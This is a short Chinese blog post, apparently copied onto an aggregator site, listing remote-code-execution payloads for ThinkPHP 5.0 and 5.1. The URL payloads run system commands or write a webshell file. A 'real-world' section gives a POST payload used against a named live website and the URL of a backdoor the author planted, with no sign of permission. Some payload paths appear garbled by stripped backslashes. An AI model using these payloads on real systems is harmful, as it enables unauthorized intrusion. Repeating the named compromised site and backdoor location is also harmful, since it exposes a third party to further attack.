thinkphp5 rce - 走看看

zoukankan html css js c++ java

thinkphp5 rce
thinkphp5 rce

rce有两个大版本的分别：
1. ThinkPHP 5.0-5.0.24
2. ThinkPHP 5.1.0-5.1.30
因为漏洞触发点和版本的不同，导致payload分为多种，其中一些payload需要取决于debug选项比如直接访问路由触发的。

5.1.x
?s=index/ hinkRequest/input&filter[]=system&data=pwd
?s=index/ hinkviewdriverPhp/display&content=
?s=index/ hink emplatedriverfile/write&cacheFile=shell.php&content=
?s=index/ hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

实战：

ThinkPHP V5.0.15

POST:
http://www.zhffcl.org.cn/index.php

s=file_put_contents('/opt/lampp/htdocs/static/upload/in.php','')&_method=__construct&method=GET&filter[]=assert

上传phpinfo到有权限的目录，虽然报错，但还是上传成功了。

后门文件位置：http://114.55.100.17/static/upload/in.php
逆水行舟，不进则退。
查看全文

相关阅读:
数据库中的字段NULL值和''
MySQL Notifier
LeetCode算法题-Delete Node in a Linked List（Java实现）
LeetCode算法题-Lowest Common Ancestor of a Binary Search Tree
LeetCode算法题-Palindrome Linked List（Java实现）
LeetCode算法题-Implement Queue Using Stacks（Java实现）
LeetCode算法题-Power Of Two（Java实现）
LeetCode算法题-Invert Binary Tree
LeetCode算法题-Implement Stack Using Queues
LeetCode算法题-Contains Duplicate II（Java实现）

原文地址：https://www.cnblogs.com/rab3it/p/14856792.html

Copyright © 2011-2022 走看看